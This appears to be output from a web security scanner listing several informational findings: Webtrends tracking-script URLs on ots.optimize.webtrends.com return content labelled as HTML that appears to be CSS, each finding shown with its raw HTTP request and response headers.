Path:	/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2c5e2033352659b4256b88303a637cca8448ceb87a0ded8d123b613ac0c1963e359c05e0230e29156736c2a6895f3c1cffa64b9fac27801e8a9146b54a1ff52d056f7f32e3f3a71fef59a588e7f0624829dbaa6efa3b690eabde83297c9688e28391fc14aac6545983263dfcfe183b902c26fa198f06ba09a74dc2d9dd314b2d6c8508dea3ea30508261a98e8d5613198ac3f4f6b8900a8b429d8819b99f11c1286c93f298c572badd95c696558ae9f0c99d497d52c971f3e0f7b2083888543e6ee92552bb074324cf667406b8fde45caf3c467f0b914c19784cec701d3d05e456b7a7c87614163cebaa008bd1545932724ece727e96238e8230075b6457f76626cee344b850b051957897be8c1f6da1a57d0398488ac4b22e1520ac3f4bde8399f7a8351b3cace45d831e915c4710f2532b6611847917c6a1feab747acf995fa0b1c35acfa90764a5c73d9f9c7e9e35666936b95be268a691e613a4bd58e6465c4f449c067dc91a33b02cb7f5fc50816597a797f92a71317acc4e6c877dd64a176ecda3ca8c5f530bd8322e9d9886c1146642fd3837d98b60fb68cd74bf8bf660d8c25f653f384f1ec24d57e40d18f21654d1afde2a43ad80766763a393d378a95a0d0a114ed6dee18feed7d40ac5d0ca298b74e18fd1d1a155ec038416abf9f1eea7fb487fb6c4cd3de4974940d48f413ab82bd125c7b1672a09090b0aad5a03580d44ddca7dd662118f572e38d0a52debddfd1010b7ac77ea00b30e7d6e50bdd71d44bb0fa7c9ca97cb7c98759dfe110c8f926b84f7fe2a48e819f36ff35a52add046452e4a76c3c4b7372201bf28e1cb66933939d9eb370b4ec2371a52216521ce237a5025a929e90e89d6af40687cbc0702584030cf05d61fc1b22c03c88879220167fd372e6b1faba801a45bb5dff3979b5f9e390fdbd5ff32d9b38c418392fccbc6bbc1dd790bb34df9fe61c2c43167b4a49761cee929ad556e9e36bbefce42a567a2f0a159899683c1149d3c7e37c004f30c74e49a0c1db2fc70559da5ab0d39ef43a489a3c167fc58a6bf47ac8b8602d41daa4555422b04aad21da10153b36d4c5923938f2b980680fdb01acad38586f6ece725a00592aea2a58375258e7a0a7a0a7d056861c8a7f036048dde45accaebee81e8b590c7384fabc2406460ce1c717fad60bada7382eb45a59dad6a6688a02643faf905273500b953dcaa0fd0699e6149a42a232b96c331d8e6d4477fd288a05cadad7fe322863bf8e0c308e8e9dc5b37c7f551f385b4f81fb34dae9d43ef239f8db09a2ef033a7105c1d5bf3a55a54d02f0772cbfafc48b17ecddbff30e8eae3b6caf77a73f4c336a1ce8f591016ff28e90d7450a76eff8cc7c274d5395b3bfb37ca9eaa47d4509c0c77a3e7881a713f9cb55f87f5321ff05df064910caa8c724160e9a49c1a4b217d18c95278ab4cfa40ca940b8e60b37af23ae433288d77f95c5400e33e3045d46367e2ceadb721902cfb3e3864c75a44a2a781f6f95325d349fb1a86bbfe239f4d3341e9890f3ab4bb899564a0be17ef98767e00d3eefb6d6e2417d7ae832cfd6d6775d7d69f754c6700bd3abe3e49ec4918027f60f10dee733e46b9c3f938fb069edb7cfd750b193ef2551071a7d8ac6ff6ed1a8b1988fe45c826b90dec9cd98be5f70f6f26c5743c6b8da338df1e1a1710568ccdca3deeefd6cecbc2a1169135385aa5728f943096e4333826758a4ee7be95e4a05c6db118cd3622321809b9a68f0b572d54267545a7fb3ff1ebecc9419ad7886874a03f937bd4009938554e3e9b36a1e75600acf69685c778e2af7b9cfed919b9ffa2e2e60123cfc2105f300be6e1a9f531e925d6fe0b10bafc2321053f1cb703b4c2844fd046d64a5ea46269793d27ab574ec2c457529ae05027e30f656b8f0c83721cb335f67131a1d69ed15e43d788c71c1013089784d845dbb576169330c255e434662e219fd0ea3db8581b703d8e30b4d2b9e518223100f6c0c3ecfeac24f759bf6c55ced5d7422eb5d028332/1311280499290-658/0/5

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2c5e2033352659b4256b88303a637cca8448ceb87a0ded8d123b613ac0c1963e359c05e0230e29156736c2a6895f3c1cffa64b9fac27801e8a9146b54a1ff52d056f7f32e3f3a71fef59a588e7f0624829dbaa6efa3b690eabde83297ca658e2d7e638f51a17253e62a7fffd4a2ddfe438d2ee59bea3af3a232c03dcc8157ea978d4cd6a469e343127057d7bfe8763abcf03c435b8b06a8ab33d387cfc8fe0b1591c96939835066ea984c697621aad753d89197c375e55d7965726d83b4895ae6fbc44d3386156e14a93305329fdc44d2e88220a0f96083aab5f2f573aa961511747130962c1f3596fdf71bb3193ae42434eee026e16838eb260177ad43797c740f8d5f3bef244e4d02877beec0eed21a54c73a858cb80a65ef4e0ac6f5b6e6389a728d52a5c1c554b951816fa4195e6332a868184bc6247e5ca0bb4da1acc1a40d522becaec2310e0c31999095a2a80828b056ab9c03e37463095c35d982474fadb20dcf11d5c0fd54438b6915985c221f253a4488812457fceea0e2208a37d705e8cb48a191a70496b47eb898e21b5713476f89d52ae4e03ae787d03e92ce12118b51f521e58ee99b45a4004facc00f7e411bfdf7bf72ef5b4f763d240430bd9da0f1fd50bf7fec1ffeed7c5eaf4d0cab82b74618fc19066d078507477aa29619ab55a1dad95356c9c36e44940b598d42e8c8b21344661472be8292b1a1c6a63f8fd75fabfb8e320302f966f8d0335dd9fae8ed1a0161d673a5426de980e140d9249f54b9ae7cddb678eb99834e88b401e3bd7cfd176abcf2c898ea3da938ea02fd032b05a4ae392c5343796647f9f619a63b3396cbd5b773e5a7682ef4735d054ab666be000592def0e7987efd138ecbd238178d0e4fd37d66b31237c93c9acfba33567bd066cffacab595151cae06ab6d729ef6e684f4a856f33fd31dcd511f2fca886dbd01c5b2fc09c386b9487841194e51556c07fbdb86ae14c1e47ca5e7ee115f65642747b6b33c64716dc8d7e5451a533fc75d35efefc023c6054cc175a0c0e7a76e16c3635633a4c832a122c4d4192148c8d21c7a13ee048512e77a6565319e98d9636de391d16707df56a8b9370d633ed0210e525b30e42258305d1a8cabd7cea8b82ca719883d77044ddae70e9cacaa8610de56150bd88aff5e5a631087b66082a379d8845a2eb64850a681927bf27c1850d0e311101405c606b0e0be4aeeb02a9d2aa453ae541b35866838078f5df377b3aca4af56301ed2e10741fe989086bb3d274d08755140b5bd219de0c366fa66a9f07efbe5105c146bb7b4df5032c3400792317aeda2f5d852e2d9ddad09d5ac4410d252c74728191d70d983a66906ea948cd65c1360f890bc25794b5985b4b7a226d0b4f62c1e51b2830a4102e0d87180e933865c39138267a5723569ac83b02c6a4a9b5fcfe1e94791c4b72bdcba808c2cae0fe1ac5761ea3b89037a8f9a77ce86305874b0140f432c7d30a78d231e07d9b5b5dd1c78fb595737317499335d2184f99f3796e23ee9ea33299090d2f70fea8b544c0be17fe78477e30c24eeb2d6e4456102b177f0d0c66a547a28dd419b4a28d7baefe295c3b38c69af4c4cd1e73a853ede7ddad2ee10b1ec9e8b05b997e27b145e5026d58be917968797cece9202e640a6f5f98be6cc4816a3c75a781a9ab88e7cabcbb4b20b0431998faadaeea764b9bb5c333b110b84a9260b83615f4e356380332e85906ff73f154ae8fd4cd48e731211ac899073fbf164904c2e1a1c69fde040b1978015bd2281c40050f262b00945da9f44b9f7b3671f525b37940c2f47709f34b9ff81f695c3e2e2373d7d0f3bbd2602ad1bf32f17af6f7fc51462fba01caa8a744b5dd9d92d25402542fb166e71fea0402f9bc9db60b660ec734e2f28b7160f6f0fc54aa4f6d96406ca3341711a2f5121a84db37b64c831f45c21e6295c9352ae51363f044f731959463ef64cb154b9c99cdbff0edce5185c24944dd96351282c1234d3e2c6542286d09804f44e7475ec4a15d026/1311280711520-955/0/4

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2c5e2033352659b4256b88303a637cca8448ceb87a0ded8d123b613ac0c1963e359c05e0230e29156736c2a6895f3c1cffa64b9fac27801e8a9146b54a1ff52d056f7f32e3f3a71fef59a588e7f0624829dbaa6efa3b690eabde83297ca658e2d7e638f51a17253e62a7fffd4a2ddfe438d2ee59bea3af3a232c03dcc8157ea978d4cd6a469e343127057d7bfe8763abcf03c435b8b06a8ab33d387cfc8fe0b1591c96939835066ea984c697621aad753d89197c375e55d7965726d83b4895ae6fbc44d3386156e14a93305329fdc44d2e88220a0f96083aab5f2f573aa961511747130962c1f3596fdf71bb3193ae42434eee026e16838eb260177ad43797c740f8d5f3bef244e4d02877beec0eed21a54c73a858cb80a65ef4e0ac6f5b6e6389a728d52a5c1c554b951816fa4195e6332a868184bc6247e5ca0bb4da1acc1a40d522becaec2310e0c31999095a2a80828b056ab9c03e37463095c35d982474fadb20dcf11d5c0fd54438b6915985c221f253a4488812457fceea0e2208a37d705e8cb48a191a70496b47eb898e21b5713476f89d52ae4e03ae787d03e92ce12118b51f521e58ee99b45a4004facc00f7e411bfdf7bf72ef5b4f763d240430bd9da0f1fd50bf7fec1ffeed7c5eaf4d0cab82b74618fc19066d078507477aa29619ab55a1dad95356c9c36e44940b598d42e8c8b21344661472be8292b1a1c6a63f8fd75fabfb8e320302f966f8d0335dd9fae8ed1a0161d673a5426de980e140d9249f54b9ae7cddb678eb99834e88b401e3bd7cfd176abcf2c898ea3da938ea02fd032b05a4ae392c5343796647f9f619a63b3396cbd5b773e5a7682ef4735d054ab666be000592def0e7987efd138ecbd238178d0e4fd37d66b31237c93c9acfba33567bd066cffacab595151cae06ab6d729ef6e684f4a856f33fd31dcd511f2fca886dbd01c5b2fc09c386b9487841194e51556c07fbdb86ae14c1e47ca5e7ee115f65642747b6b33c64716dc8d7e5451a533fc75d35efefc023c6054cc175a0c0e7a76e16c3635633a4c832a122c4d4192148c8d21c7a13ee048512e77a6565319e98d9636de391d16707df56a8b9370d633ed0210e525b30e42258305d1a8cabd7cea8b82ca719883d77044ddae70e9cacaa8610de56150bd88aff5e5a631087b66082a379d8845a2eb64850a681927bf27c1850d0e311101405c606b0e0be4aeeb02a9d2aa453ae541b35866838078f5df377b3aca4af56301ed2e10741fe989086bb3d274d08755140b5bd219de0c366fa66a9f07efbe5105c146bb7b4df5032c3400792317aeda2f5d852e2d9ddad09d5ac4410d252c74728191d70d983a66906ea948cd65c1360f890bc25794b5985b4b7a226d0b4f62c1e51b2830a4102e0d87180e933865c39138267a5723569ac83b02c6a4a9b5fcfe1e94791c4b72bdcba808c2cae0fe1ac5761ea3b89037a8f9a77ce86305874b0140f432c7d30a78d231e07d9b5b5dd1c78fb595737317499335d2184f99f3796e23ee9ea33299090d2f70fea8b544c0be17fe78477e30c24eeb2d6e4456102b177f0d0c66a547a28dd419b4a28d7baefe295c3b38c69af4c4cd1e73a853ede7ddad2ee10b1ec9e8b05b997e27b145e5026d58be917968797cece9202e640a6f5f98be6cc4816a3c75a781a9ab88e7cabcbb4b20b0431998faadaeea764b9bb5c333b110b84a9260b83615f4e356380332e85906ff73f154ae8fd4cd48e731211ac899073fbf164904c2e1a1c69fde040b1978015bd2281c40050f262b00945da9f44b9f7b3671f525b37940c2f47709f34b9ff81f695c3e2e2373d7d0f3bbd2602ad1bf32f17af6f7fc51462fba01caa8a744b5dd9d92d25402542fb166e71fea0402f9bc9db60b660ec734e2f28b7160f6f0fc54aa4f6d96406ca3341711a2f5121a84db37b64c831f45c21e6295c9352ae51363f044f731959463ef64cb154b9c99cdbff0edce5185c24944dd96351282c1234d3e2c6542286d09804f44e7475ec4a15d026/1311280711520-955/0/4 HTTP/1.1
Host: ots.optimize.webtrends.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-us/security_essentials/Support.aspx
Cookie: JSESSIONID=AC7D1A685709A0A4858963A4C5358DAE

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 20:38:25 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Content-Length: 410
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding

/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.1 2009-11-24 23:15:52 michae
...[SNIP]...

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2ceea0b244f73924150e4851eaf77c4af078ceac7bc95cfcd21f514bd03137fe24bd3210025f9ba446a7c715395e6bfcffb5aa0a8c52932e9aa046641bbef04c138c7e7220c0b48faf3be5b9a2a3035c1d5f4fc8aecf6c5e7bdfe70d4dd4d812839219001e57855c84e2eb1caf499b852de7fe58dea01e0ab09b67883d529bdc0cf0b98a461fc43117445cbad883473cee03f416c8d32ada22884c996d0b0221495dc6d7ee90829a38d4c2e2c4c9bd857c986ddad77b70879652b7fc2f7c45feee8af1975ae2e7c13ba32162f8f8c109497db37afed36d79585df8311cbd650572a2f68ce6b4b7f87e9be08ca7438f22d3bece727e96334e1260e70b0417d6f6e19f7283cf7721a3766fd0efddefab44c148a54c3d5dd2127eb3c0ebbfdd1f23b8e7a8b5caab8cb41d9289813c6784e6739b2620434950c6a04e7b34edffeeabf4d6435a7f283685e2810a98bd2ebf92875f20e89c243eb631a192345d6f03832d1c502bb17a0c3fc2041f96719e528410731647ebd8e0903a1ded0d379c664ff2483b557dcdae854a6b178adb3a32851295539da987585b60da096c27ae292501c8343f523f588e29747a50f49a9d67b3a700ce2e1b160b95921401a0f1c0f9cab86e0be1ef872fe04f3b23e03f80e58fbd0e61e00f50f196f7586781c6fb58b19ad5cbbd1bd080093f61802c74d03ff06ae9faa11306c1471e2c4c3f4f5c3a63d90d72ab4f9fc317c59f475fac679099ff198c350583afa7e8d3a70e8d4f716ac65c94bf5b92199a97ea8c9f21684b553e3f92baf4429bf81df9dee2df933a93ce001341af2f36d7d4e56273e12af8948a26965c79e80e130b4ce2b7ad130425140b173e70f0d82d1a9e49a3da947cd9ef56f42db505fab2d31f14a77956acbd3b763092bc067e5eef5b8c34e5af808d87a66e1aeb6c6a3ed0cac7fcd69910d44739cfe3cff4684dda24d9dc0b24c6935551f111f2d2bb89d9a9115caee67befaf360023c247a3bc6d7331a721293c7e2581f5920c0564ab4a9810d905f68c052a098b1f931438a705742b4d244b338d7ac52750eaf9d5d4335fd03e015cb4a2d203bcfc4867472a4bdb7055e9e44f2e57c5e7861c10c05513d74b7694e2f4b15d997f5f484a725e0138829586a488ab11d81b9db8278a4291770c7f3fb3b45704ae8d213f3d208a9f52650c72427c8d7f27f8d141958b29558715506805b8ba1f616e8e9698a38ad5ef7164173fd1c34079c5df57cbeaeacab5a2102c5e15a02bba2b9d9d53f26453f770e2cadae2fd9e0c464a664d4d708b2e9043d7719cda0be374dae3e049d685ab8fbd885639daaa6a07edbb5487ff662f166596c7968a8ead75522cbb386dd31620b8c9ec17a2a0802c7e8e4e63ba784ae764057a4d25447588c8b70d0bd5e9e0c35118f72a877636bb8d8a0357914a64dc0a2b0539f80e77bd4ec9ef67cf949bbec0a33bb27fc0771cbdd5a90ca581b5781767122516d3baa8e31031494e4ccc5156e9504123d5c2fc261782787bfd929ebb26daf8f606acfdea6ae5bc8fb305908f10fea8c659b1b4dfeaece9a220464d315ef9b9f3a5f6630d559da6539f5a8fed9b4f691846ea31a13ce8148891dfd4d9187a23abaa1d9c02dde9dd40970272f46bff78273ed8a9dbeb2e4719d47c18d9ff3ccec0b4ce0ee794a02eb94da378ffdcdeb1a4d77b6b9d3aef5fe7696e70b27355305dbec3b2ec9625d59696dd9137f95cd6ff73f3c76bbaa1b93d5657373d49e9d30a0b575d3426702087fe8af18e895cb4ef97f86841c01ac6bbd11568a0123cabc

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2ceea0b244f73924150e4851eaf77c4af078ceac7bc95cfcd21f514bd03137fe24bd3210025f9ba446a7c715395e6bfcffb5aa0a8c52932e9aa046641bbef04c138c7e7220c0b48faf3be5b9a2a3035c1d5f4fc8aecf6c5e7bdfe70d4dd4d812839219001e57855c84e2eb1caf499b852de7fe58dea01e0ab09b67883d529bdc0cf0b98a461fc43117445cbad883473cee03f416c8d32ada22884c996d0b0221495dc6d7ee90829a38d4c2e2c4c9bd857c986ddad77b70879652b7fc2f7c45feee8af1975ae2e7c13ba32162f8f8c109497db37afed36d79585df8311cbd650572a2f68ce6b4b7f87e9be08ca7438f22d3bece727e96334e1260e70b0417d6f6e19f7283cf7721a3766fd0efddefab44c148a54c3d5dd2127eb3c0ebbfdd1f23b8e7a8b5caab8cb41d9289813c6784e6739b2620434950c6a04e7b34edffeeabf4d6435a7f283685e2810a98bd2ebf92875f20e89c243eb631a192345d6f03832d1c502bb17a0c3fc2041f96719e528410731647ebd8e0903a1ded0d379c664ff2483b557dcdae854a6b178adb3a32851295539da987585b60da096c27ae292501c8343f523f588e29747a50f49a9d67b3a700ce2e1b160b95921401a0f1c0f9cab86e0be1ef872fe04f3b23e03f80e58fbd0e61e00f50f196f7586781c6fb58b19ad5cbbd1bd080093f61802c74d03ff06ae9faa11306c1471e2c4c3f4f5c3a63d90d72ab4f9fc317c59f475fac679099ff198c350583afa7e8d3a70e8d4f716ac65c94bf5b92199a97ea8c9f21684b553e3f92baf4429bf81df9dee2df933a93ce001341af2f36d7d4e56273e12af8948a26965c79e80e130b4ce2b7ad130425140b173e70f0d82d1a9e49a3da947cd9ef56f42db505fab2d31f14a77956acbd3b763092bc067e5eef5b8c34e5af808d87a66e1aeb6c6a3ed0cac7fcd69910d44739cfe3cff4684dda24d9dc0b24c6935551f111f2d2bb89d9a9115caee67befaf360023c247a3bc6d7331a721293c7e2581f5920c0564ab4a9810d905f68c052a098b1f931438a705742b4d244b338d7ac52750eaf9d5d4335fd03e015cb4a2d203bcfc4867472a4bdb7055e9e44f2e57c5e7861c10c05513d74b7694e2f4b15d997f5f484a725e0138829586a488ab11d81b9db8278a4291770c7f3fb3b45704ae8d213f3d208a9f52650c72427c8d7f27f8d141958b29558715506805b8ba1f616e8e9698a38ad5ef7164173fd1c34079c5df57cbeaeacab5a2102c5e15a02bba2b9d9d53f26453f770e2cadae2fd9e0c464a664d4d708b2e9043d7719cda0be374dae3e049d685ab8fbd885639daaa6a07edbb5487ff662f166596c7968a8ead75522cbb386dd31620b8c9ec17a2a0802c7e8e4e63ba784ae764057a4d25447588c8b70d0bd5e9e0c35118f72a877636bb8d8a0357914a64dc0a2b0539f80e77bd4ec9ef67cf949bbec0a33bb27fc0771cbdd5a90ca581b5781767122516d3baa8e31031494e4ccc5156e9504123d5c2fc261782787bfd929ebb26daf8f606acfdea6ae5bc8fb305908f10fea8c659b1b4dfeaece9a220464d315ef9b9f3a5f6630d559da6539f5a8fed9b4f691846ea31a13ce8148891dfd4d9187a23abaa1d9c02dde9dd40970272f46bff78273ed8a9dbeb2e4719d47c18d9ff3ccec0b4ce0ee794a02eb94da378ffdcdeb1a4d77b6b9d3aef5fe7696e70b27355305dbec3b2ec9625d59696dd9137f95cd6ff73f3c76bbaa1b93d5657373d49e9d30a0b575d3426702087fe8af18e895cb4ef97f86841c01ac6bbd11568a0123cabc HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-au/netsolutionswa/casestudies.aspx?bladeFlyout=LocalePicker&SearchType=0&navIndex=2&hdrFo=mthdr02
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=BF7780E003CE01313D85D5C6CF53E033

Response

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2ceea0b244f73924150e4851eaf77c4af078ceac7bc95cfcd21f514bd03137fe24bd3210025f9ba446a7c715395e6bfcffb5aa0a8c52932e9aa046641bbef04c138c7e7220c0b48faf3be5b9a2a3035c1d5f4fc8aecf6c5e7bdfe70d4dd4d812839219001e57855c84e2eb1caf499b852de7fe58dea01e0ab09b67883d529bdc0cf0b98a461fc43117445cbad883473cee03f416c8d32ada22884c996d0b0221495dc6d7ee90829a38d4c2e2c4c9bd857c986ddad77b70879652b7fc2f7c45feee8af1975ae2e7c13ba32162f8f8c109497db37afed36d79585df8311cbd650572a2f68ce6b4b7f87e9be08ca7438f22d3bece727e96334e1260e70b0417d6f6e19f7283cf7721a3766fd0efddefab44c148a54c3d5dd2127eb3c0ebbfdd1f23b8e7a8b5caab8cb41d9289813c6784e6739b2620434950c6a04e7b34edffeeabf4d6435a7f283685e2810a98bd2ebf92875f20e89c243eb631a192345d6f03832d1c502bb17a0c3fc2041f96719e528410731647ebd8e0903a1ded0d379c664ff2483b557dcdae854a6b178adb3a32851295539da987585b60da096c27ae292501c8343f523f588e29747a50f49a9d67b3a700ce2e1b160b95921401a0f1c0f9cab86e0be1ef872fe04f3b23e03f80e58fbd0e61e00f50f196f7586781c6fb58b19ad5cbbd1bd080093f61802c74d03ff06ae9faa11306c1471e2c4c3f4f5c3a63d90d72ab4f9fc317c59f475fac679099ff198c350583afa7e8d3a70e8d4f716ac65c94bf5b92199a97ea8c9f21684b553e3f92baf4429bf81df9dee2df933a93ce001341af2f36d7d4e56273e12af8948a26965c79e80e130b4ce2b7ad130425140b173e70f0d82d1a9e49a3da947cd9ef56f42db505fab2d31f14a77956acbd3b763092bc067e5eef5b8c34e5af808d87a66e1aeb6c6a3ed0cac7fcd69910d44739cfe3cff4684dda24d9dc0b24c6935551f111f2d2bb89d9a9115caee67befaf360023c247a3bc6d7331a721293c7e2581f5920c0564ab4a9810d905f68c052a098b1f931438a705742b4d244b338d7ac52750eaf9d5d4335fd03e015cb4a2d203bcfc4867472a4bdb7055e9e44f2e57c5e7861c10c05513d74b7694e2f4b15d997f5f484a725e0138829586a488ab11d81b9db8278a4291770c7f3fb3b45704ae8d213f3d208a9f52650c72427c8d7f27f8d141958b29558715506805b8ba1f616e8e9698a38ad5ef7164173fd1c34079c5df57cbeaeacab5a2102c5e15a02bba2b9d9d53f26453f770e2cadae2fd9e0c464a664d4d708b2e9043d7719cda0be374dae3e049d685ab8fbd885639daaa6a07edbb5487ff662f166596c7968a8ead75522cbb386dd31620b8c9ec17a2a0802c7e8e4e63ba784ae764057a4d25447588c8b70d0bd5e9e0c35118f72a877636bb8d8a0357914a64dc0a2b0539f80e77bd4ec9ef67cf949bbec0a33bb27fc0771cbdd5a90ca581b5781767122516d3baa8e31031494e4ccc5156e9504123d5c2fc261782787bfd929ebb26daf8f606acfdea6ae5bc8fb305908f10fea8c659b1b4dfeaece9a220464d315ef9b9f3a5f6630d559da6539f5a8fed9b4f691846ea31a13ce9b559509e25dfcfbd4009bd0a6ab2fd99dc90968212c30d6909c49c7b7bc8e92cd4efa418cd8d6d7c0c61d01bfa3526d65ecd98f7eabf1e7fd57123a9d9eb4a9a5a135afe7073b1e411ed8ba394ff6540c0f3a2082352ad19978ec7c4215eebb15d7d7642621849e9a30aab127d2173507592feeec01faa3a625881da4921411f46bbd11568a039c7d6d

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2ceea0b244f73924150e4851eaf77c4af078ceac7bc95cfcd21f514bd03137fe24bd3210025f9ba446a7c715395e6bfcffb5aa0a8c52932e9aa046641bbef04c138c7e7220c0b48faf3be5b9a2a3035c1d5f4fc8aecf6c5e7bdfe70d4dd4d812839219001e57855c84e2eb1caf499b852de7fe58dea01e0ab09b67883d529bdc0cf0b98a461fc43117445cbad883473cee03f416c8d32ada22884c996d0b0221495dc6d7ee90829a38d4c2e2c4c9bd857c986ddad77b70879652b7fc2f7c45feee8af1975ae2e7c13ba32162f8f8c109497db37afed36d79585df8311cbd650572a2f68ce6b4b7f87e9be08ca7438f22d3bece727e96334e1260e70b0417d6f6e19f7283cf7721a3766fd0efddefab44c148a54c3d5dd2127eb3c0ebbfdd1f23b8e7a8b5caab8cb41d9289813c6784e6739b2620434950c6a04e7b34edffeeabf4d6435a7f283685e2810a98bd2ebf92875f20e